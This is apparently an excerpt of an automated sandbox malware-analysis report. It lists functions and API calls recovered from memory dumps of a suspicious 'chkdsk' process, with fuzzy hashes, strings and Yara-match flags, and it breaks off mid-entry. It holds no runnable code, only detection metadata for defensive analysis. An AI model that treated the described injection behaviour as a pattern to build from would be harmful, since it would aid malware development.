Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b59aa1f1c1708f9b5976e8a7e3b95c5f69fd7017b2317cd0a7b3da7b89b9ff0e
Instruction ID: a30085e5a64780e8fd94fb824ca13ba4055d47186953be6184a7fc2cc83ee235
Opcode Fuzzy Hash: b59aa1f1c1708f9b5976e8a7e3b95c5f69fd7017b2317cd0a7b3da7b89b9ff0e
Instruction Fuzzy Hash: 18900262202500034105B1584458616405E87E0211BA5C021F5014590DC52589A16725

Uniqueness

Uniqueness Score: -1.00%

Function 05942AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942ADA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1de80a5e801389925d02eb08d8da35b75a1eaef5b0b63abdc40bdf891f5ff07b
Instruction ID: b7e144185236ab68e94cb1ff19cf0f84e573247a201a65094cf89d3b7c7fba84
Opcode Fuzzy Hash: 1de80a5e801389925d02eb08d8da35b75a1eaef5b0b63abdc40bdf891f5ff07b
Instruction Fuzzy Hash: 24900226211500030105F5580748507009A87D53613A5C021F5015550CD62189715721

Uniqueness

Uniqueness Score: -1.00%

Function 059435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059435CA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 156fc425959e1375ba06710f7947be0b1c91a74adc90fb170b520295f4c517a5
Instruction ID: f384290ba550f930f6d47eeb46453b7dbef80d428f420a1ede6a3671ad314de9
Opcode Fuzzy Hash: 156fc425959e1375ba06710f7947be0b1c91a74adc90fb170b520295f4c517a5
Instruction Fuzzy Hash: 4990023260560402D100B1584558706105987D0211FB5C411B4424568D87958A616BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0505A622 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(05054526,?,05054C9F,05054C9F,?,05054526,?,?,?,?,?,00000000,00000000,?), ref: 0505A61D
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,05043AF8), ref: 0505A65D

Strings

.z`, xrefs: 0505A64C, 0505A658

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 374f2ca75e6bc095ebdedc0adf067193aaed55350ef276d38542cee716077540
Instruction ID: efc9105c0a6aa0720be3431d31af687d38cb806aee27951f77288361950bda63
Opcode Fuzzy Hash: 374f2ca75e6bc095ebdedc0adf067193aaed55350ef276d38542cee716077540
Instruction Fuzzy Hash: 2A018BB53002146FCB24EFA4EC48EAB77ACEF84224B018658FD0A57282D630E814CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 05059040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 050590E8

Strings

net.dll, xrefs: 050590B1, 05059137, 0505910F, 0505911B, 05059143
wininet.dll, xrefs: 0505909E, 050590A7

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 90854a812cad0410e5fc2fff5d69607a33387ec516fefdf24f336e4ec9475690
Instruction ID: d54371f5f12f7783571163dda5eb4bfa465fad0c660bd0e201ad9c3021f800fb
Opcode Fuzzy Hash: 90854a812cad0410e5fc2fff5d69607a33387ec516fefdf24f336e4ec9475690
Instruction Fuzzy Hash: BC31A4B2600744BBC724DF64D889FABB7F9FB48B10F14841DFA2A5B244D634B550CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 05059036 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 050590E8

Strings

net.dll, xrefs: 050590B1, 0505910F, 0505911B
wininet.dll, xrefs: 0505909E, 050590A7

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: e496e43913db12d330db2d3d3bc69ceed6036fbc41e45b24967febd678b19f7f
Instruction ID: 763c354c8a22a75493c220121d1d58e9d6d43df14db0ed69051f222e0f434cfa
Opcode Fuzzy Hash: e496e43913db12d330db2d3d3bc69ceed6036fbc41e45b24967febd678b19f7f
Instruction Fuzzy Hash: 4021F2B2600304BBCB14DF64D8C9FABB7B8BB48700F14842DEA1A6B240D670A510CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0505A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,05043AF8), ref: 0505A65D

Strings

.z`, xrefs: 0505A64C, 0505A658

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a97ea5d5768a59fc7f28c63bb556dd68e8443f2342023516e6196bd2963b9947
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A4E01AB52002046BD714DF99DC49EA777ACAF88650F014554BD0957241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0504839C Relevance: 3.2, APIs: 2, Instructions: 183
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b296210bdaa3fd7710cd425ea0fbaac9d580c81dce51cf7669596f9741e02481
Instruction ID: 962340247c3231f8704b92b4923b7ed844e0274a29c3607cda4efcf3817dc8fa
Opcode Fuzzy Hash: b296210bdaa3fd7710cd425ea0fbaac9d580c81dce51cf7669596f9741e02481
Instruction Fuzzy Hash: A16192B0A00209AFDB25DF64EC89FEF77E8EF49704F00496DE909A7240DB7069418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0504830B Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2e0b671f35c656cf5f67cc1541c9e996106e980b4d3ee3579117b0b437dab0b7
Instruction ID: 599f2cefeb507597dca47a9fc256f74d73dd46c2b20072a0a2c85f454337dd40
Opcode Fuzzy Hash: 2e0b671f35c656cf5f67cc1541c9e996106e980b4d3ee3579117b0b437dab0b7
Instruction Fuzzy Hash: B501FC71B8031877E721AA94AC46FFF776C6F50B51F044524FF04BA1C0D6A4790547E1

Uniqueness

Uniqueness Score: -1.00%

Function 05048310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
Instruction ID: e1db038327b048f368a074747dfc8d4e307ce07695c8de0f3661b71876b42629
Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
Instruction Fuzzy Hash: 7D01A771B8022877EB21AA94AC06FFF776C6F50A51F044124FF04BA1C1E694790546F5

Uniqueness

Uniqueness Score: -1.00%

Function 05059163 Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0504F040,?,?,00000000), ref: 050591AC

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6560531154ad2837b37edeeaea4b84d690999b04cb0e251fa2bfbb41929269a1
Instruction ID: 5faaae8aa0522489fb1c41918595e03a5233e99dd93582c1a6ff43dd7025b5fe
Opcode Fuzzy Hash: 6560531154ad2837b37edeeaea4b84d690999b04cb0e251fa2bfbb41929269a1
Instruction Fuzzy Hash: A541B1B2600705ABD728DF74DC85FEBB3E9BF54714F440519F92A97180DA74B910C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0505A6FA Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 676bcd88eb09f7b16c334c4a475d118156a6f0fb8279362420abe90a643d7d88
Instruction ID: 1e382323bbb6eeb3ec6a74ebc56b006d0a135b3887028bd50cbdf036214ed695
Opcode Fuzzy Hash: 676bcd88eb09f7b16c334c4a475d118156a6f0fb8279362420abe90a643d7d88
Instruction Fuzzy Hash: C511EAB6200108AFCB14DF99DC85EEB77ADAF8C354F158259FA0D97241C630E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0504ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0504AD52

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction ID: 0c6b841023a53d768d5dc32ac4b5ecbf45172421ad5cf5943d1cdfdd516bc89f
Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction Fuzzy Hash: FE015EB6E4020DABDF10DAA0EC45FEEB3B9AB14208F0045A5ED0997280F630EB44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0505A69D Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: cb4541a9e0b33d5f57d963a66e423995f4d7c7f5581a3adc8fafa1ce299b0682
Instruction ID: d77a79dc1dc9b98fb06afc4d81b9d2096d87f36470c238ab8c71d6cca1efe643
Opcode Fuzzy Hash: cb4541a9e0b33d5f57d963a66e423995f4d7c7f5581a3adc8fafa1ce299b0682
Instruction Fuzzy Hash: A301AFB2210108AFCB58DF89DC81EEB77ADAF8C754F158258FA4DA7250C630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c4f35a03306f92dad0ee131ff92c741707da1c3429479b1f8a0e83fd4fb2b48f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05059170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0504F040,?,?,00000000), ref: 050591AC

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
Instruction ID: 45860e2e33c4a31788e51119c77cd9b1157d6d73008849669b4b11f7218f19a2
Opcode Fuzzy Hash: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
Instruction Fuzzy Hash: 74E06D773802143AE6206599BC02FEBB39C9B91B30F580026FA0DEB2C0D595F40182A8

Uniqueness

Uniqueness Score: -1.00%

Function 0505A782 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0504F1C2,0504F1C2,?,00000000,?,?), ref: 0505A7C0

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bc2d18565f718ebad987b8f2750fea723794648b5f4fe306d2c8e7571bd3698f
Instruction ID: 2bcaeffb92ecc6c4ab07d79ec418cee19828cea798cae25ee2569c12bfb2eb8e
Opcode Fuzzy Hash: bc2d18565f718ebad987b8f2750fea723794648b5f4fe306d2c8e7571bd3698f
Instruction Fuzzy Hash: 17E065B5200204AFDB20DF65DC84EDB37A9AF85354F158159FD49AB691D530A8058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0505A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(05054526,?,05054C9F,05054C9F,?,05054526,?,?,?,?,?,00000000,00000000,?), ref: 0505A61D

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ad78afd5091a85a449bb85232f6bb374f968a0f32ab86cd91ca874c33a51eebe
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 96E046B6200208ABDB14EF99DC45EEB77ACEF88664F118558FE095B241C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0504F1C2,0504F1C2,?,00000000,?,?), ref: 0505A7C0

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 57ae5c7a1b73334ce717c51c627f981d41dc1fde27632002da240014f45ba7a5
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 5FE01AB52002086BDB10DF89DC85EEB37ADAF88650F018154BE0957241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0504F6B7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,05048D14,?), ref: 0504F6EB

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1788a7c6e2e5b9c70eb07c57c9e908be57128d1d4545857041f7589371aba70c
Instruction ID: 6c98092aab24467d7201406b7a3cd0f37501a282267f8443bf7c57886b2bb8e1
Opcode Fuzzy Hash: 1788a7c6e2e5b9c70eb07c57c9e908be57128d1d4545857041f7589371aba70c
Instruction Fuzzy Hash: 68E0C276750A082BEB20EAA0AC06FAB33946B50A50F050074FC0BEB3C3E610C0024620

Uniqueness

Uniqueness Score: -1.00%

Function 0504F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,05048D14,?), ref: 0504F6EB

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
Instruction ID: b9ff7c66fc956cfebc71b0ba1e3e34ac1ff32881bf9ec3d12f919a3c19fcbf58
Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
Instruction Fuzzy Hash: 08D0A7767503043BEB10FEA4AC07F6B33CC6B54A10F490074F949D73C3D954E0004565

Uniqueness

Uniqueness Score: -1.00%

Function 05942C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942C24

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e02e9153333db289c80ba7930508421ec0487f7cf63fa8b8d4f1b97d7c8c4ee7
Instruction ID: 89466a6fc67e90aa9a9ddab81b802444b675a93030dc9ba36905aceb348df093
Opcode Fuzzy Hash: e02e9153333db289c80ba7930508421ec0487f7cf63fa8b8d4f1b97d7c8c4ee7
Instruction Fuzzy Hash: 42B09B729015C5C5DE11E760460CF27795577D0711F65C061F2030641E4778C5D1EB75

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05942890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0594293C
___swprintf_l.LIBCMT ref: 0594295E
___swprintf_l.LIBCMT ref: 059429A3
___swprintf_l.LIBCMT ref: 0597A52E

Strings

:%u.%u.%u.%u, xrefs: 0597A5B8
ffff:, xrefs: 0597A504
::%hs%u.%u.%u.%u, xrefs: 0597A527
::ffff:0:%u.%u.%u.%u, xrefs: 0597A54E

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d89bfabf1c58e013a8ec61a1a072a15022872b666b32f497aa474da1c67b7420
Instruction ID: f24f92cd5422d25e078faac4eff78de6580a3631ba1221f105bf4070753644a3
Opcode Fuzzy Hash: d89bfabf1c58e013a8ec61a1a072a15022872b666b32f497aa474da1c67b7420
Instruction Fuzzy Hash: 4C51C9B5A04116BFCF20DFA88990D7EFBF9BB48200B54856AF455D7641E734DE50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 059B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 059B24A6
___swprintf_l.LIBCMT ref: 059B24E2
___swprintf_l.LIBCMT ref: 059B257D
___swprintf_l.LIBCMT ref: 059B25A3
___swprintf_l.LIBCMT ref: 059B25C8
___swprintf_l.LIBCMT ref: 059B2608

Strings

ffff:, xrefs: 059B247D, 059B249D
:%u.%u.%u.%u, xrefs: 059B25FF
::%hs%u.%u.%u.%u, xrefs: 059B249E
::ffff:0:%u.%u.%u.%u, xrefs: 059B24DA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7274bb1fc89bb134edf049451b83d0004a3f728e1e23ab05d45f92e14b2d1d4e
Instruction ID: d1f9471594b12b41b2efa04ed8d432283ec95cecd9874b97748cc365afb1adb9
Opcode Fuzzy Hash: 7274bb1fc89bb134edf049451b83d0004a3f728e1e23ab05d45f92e14b2d1d4e
Instruction Fuzzy Hash: 0F510879700645AEFF24DF5CCA909BFB7FEEB48200B008869E596C7641DAF4EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 05937630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05974742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05974655
ExecuteOptions, xrefs: 059746A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 059746FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05974725
Execute=1, xrefs: 05974713
CLIENT(ntdll): Processing section info %ws..., xrefs: 05974787

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 8a2b85aad4add2d5e67d85dbeec7cb3cc74e02960d85ad2351a5389c3f2dc253
Instruction ID: 5e1e9e539263b126b25fac296b09f05d285f322a2999146b0cb8fa21266d6478
Opcode Fuzzy Hash: 8a2b85aad4add2d5e67d85dbeec7cb3cc74e02960d85ad2351a5389c3f2dc253
Instruction Fuzzy Hash: AC51F4B5700219BADF10EBA4DC9AFBA77A9FB45304F0404A9E506A7181EB71AF41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 059D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

